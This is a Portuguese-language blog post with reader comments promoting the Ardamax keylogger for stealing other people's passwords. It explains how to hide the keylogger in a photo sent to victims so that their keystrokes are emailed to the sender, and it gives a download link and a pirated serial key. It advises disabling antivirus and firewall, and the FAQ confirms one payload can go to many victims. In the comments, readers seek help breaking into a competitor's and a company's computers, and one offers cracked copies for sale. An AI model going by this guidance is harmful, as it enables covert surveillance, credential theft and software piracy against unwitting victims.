Jean Carlos Cunha

.:: Diferente e eficiente::.

Programa para roubar dados

Hoje estou em um dia meio de anti-hacker dai entao mais um post neste sentido, so que a tituto de conhecimento to postando esse material sobre um programa utilizado por usuarios mal intencionados para roubar informaçoes, de outras pessoas.
“E HORA DE POSTAR”

o que é keylogger?

Key logger (que significa registrador do teclado em inglês) é um programa de computador do tipo spyware cuja finalidade é monitorar tudo o que a vítima digita, a fim de descobrir suas senhas Orkut, MSN, Chats e afins. Muitos casos de phishing, assim como outros tipos de fraudes virtuais, se baseiam no uso de algum tipo de keylogger, instalado no computador sem o conhecimento da vítima, que captura dados sensiveis e os envia a um “hacker” que depois os utiliza para fraudes ou para o bem!

video aula:

pra que serve o keylogger?

basicamente para que voce envie virus para alguem atraves de um arquivo, por exemplo uma foto, dai entao apartir do momento em que a pessoa recebe e abre a foto
tudo o que ela faz e enviado para o email configurado no programa.

download:

http://superdownloads.uol.com.br/redir.cfm?softid=20716

serial:
Name: membros Serial: UKPIUQDTITNVNRP

Perguntas Freguentes!

Baixei o Ardamax e meu Anti-Virus Detectou que tinha um Virus! E agora?
O que você acha que é o Ardamax? Um virus, mas nao te faz mal nenhum.

Cannot install incon package, %1 não é um aplicativo de win32 válido
Esse é um erro comum se você usa AVG, pra resolver só desinstalando o AVG!

Termino de criar o server e dá esse erro: Unable to create de package installation (acesso negado)
Basta você desativar seu anti-vírus e firewell.

Tem como eu juntar o meu server de keylogger com uma foto (.JPG)?
Sim, mas a extenção continuará .exe (Ou seja não vai adiantar quase nada)

Posso mudar o .exe para .jpg ou .txd ?
Não, se mudar a extenção .exe você estragará o keylogger.

Como junto ele com outro programa ou arquivo?
Do mesmo modo que se junta com fotos! Assista a video-aula e você saberá;

Um server pode ser mandado pra várias vítimas?
Sim, pode mandar pra quantas pessoas quizer!

Enviei o server, mas não recebo e-mail nenhum
Olha na caixa “Spamm” do seu e-mail, se não tiver lá é pq a pessoa não clicou no server.

A pessoa executou, mas não recebo os e-mails (nem na caixa spamm).
Você deve ter feito algo errado, refaça seu server que dá certo!

Retirando o Keylloger Do Pc!

desinstalar

para desinstalar o keylogger:
1º Desative o seu anti virus
2º Va ate a pasta do keylogger(C:\Arquivos de programas\IWM)
3º Execute o programa de desintalação do A.k.

OBS: Se vc naum achar a pasta iwm eh porque a pasta do keylogger esta com outro nome.
Pode está como HvT!

comentario

16 Respostas para “Programa para roubar dados

  1. gustavo 15 de janeiro de 2009 às 12:40 am

    pow.. u fiz errado.em vez de excutor e salvei.. e agora naum consigo executar.. como q eudeleto o outro p fazer o correto?

  2. Rose 5 de fevereiro de 2009 às 3:54 pm

    Oi Jean , tudo bem? Preciso entrar no computer de 1 concorrente para pegar cadastro de clientes…como faço? Qto custa?

  3. jean carlos 5 de fevereiro de 2009 às 6:24 pm

    ola. nao posso forneçer esse tipo de informação. somente disponibilizo a forma e como utilizar porem fazer alguma coisa ou quem faz e quanto custa nao posso informar.

  4. Rose 11 de fevereiro de 2009 às 9:38 pm

    ok…como tenho que fazer então?
    Abs

  5. eu 7 de maio de 2009 às 7:50 pm

    não axooo esse programa mais nesse site e agora?

  6. eu 7 de maio de 2009 às 7:50 pm

    ME AJUDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  7. jean 7 de maio de 2009 às 10:05 pm

    de onde voce ? qual seu email?

  8. isaac 1 de setembro de 2009 às 4:10 am

    Bem eu ja useii o ardamax keyloger 8.0
    Mais eu fiz algumas modificações no seu codigo font

    Agora ele esta mais facil de operar e configurar ..

    Duvidas e so acessar o meu site ok

    Abraços a todos os bãos piratas

  9. thiago 26 de outubro de 2009 às 7:05 pm

    esses programinhas so mexem com msn e orkut…
    nada alem disso
    manda umas informaçoes melhores ai

  10. raquel 1 de fevereiro de 2010 às 9:00 pm

    adorei a video aula,já tinha instalado o meu que um amigo me deu num cd instalei o meu só que eu vejo tudo o que eu escrevo,no caso do msn,só que não entra o que a outra pessoa tá mandando,e nem grava nada da internet !!SOCORRO!! me ajudem,é uma mãe desesperada ,sem saber o k fazer!!
    obrigada
    Raquel!!

  11. Kobissa 18 de março de 2010 às 12:31 am

    Amigo, gostaria de acessar o PC da empresa de formaturas atraves de minha makina e ter acesso as fotos de minha solenidade. Queremme cobrar 900 reais num album com 50 fotos.

    da pra me ajudar?

    to no aguardo!!!

  12. Maria Moura 14 de maio de 2010 às 4:57 pm

    Nao consigo enviar nada com o Keylloger …..sempre qdo vou enviar pra alguem,aparece: fotos.exe.zip (502 KB) Ameaça de vírus detectada. O vírus não pôde ser removido. Execute a verificação antivírus em seu computador.
    E agora???Como vou conseguir enviar????
    Respondem,por favor………..

  13. x 1 de junho de 2010 às 5:03 pm

    oi!!
    estou com o meu pc infectado,nao consigo aceder as contas de utilizador,daando me erro em todos os codicos que meto,insiro um progama novo,da me o erro de que nao tenho previligios para aceder.
    Pode-me ajudar??
    preciso urgentemente de tirar isto do computador
    Deixo meu mail :
    almeida69198@hotmail.com

  14. mineiro 3 de agosto de 2010 às 4:04 pm

    ai brother nao tem nhenum site que possa baixar esse aedamax keylogger….ja tantei em todus aki ….. seria possivel vc me fornecer ho site correto…falows

  15. TH3 M4QU1N3 6 de dezembro de 2010 às 2:40 am

    AEW EU TENHO, O ARDAMAX LIMPO, SEM KEYS, SEM TROJANS, SEM MALWARES, COMPREI ELE DO PROPRIO SITE, ENTERESSADOS POSSO VENDER!
    POREM O EMAIL ANEXADO ACIMA NAO E VALIDO. DEIXEM A RESPOSTA AKE!

Deixe uma resposta

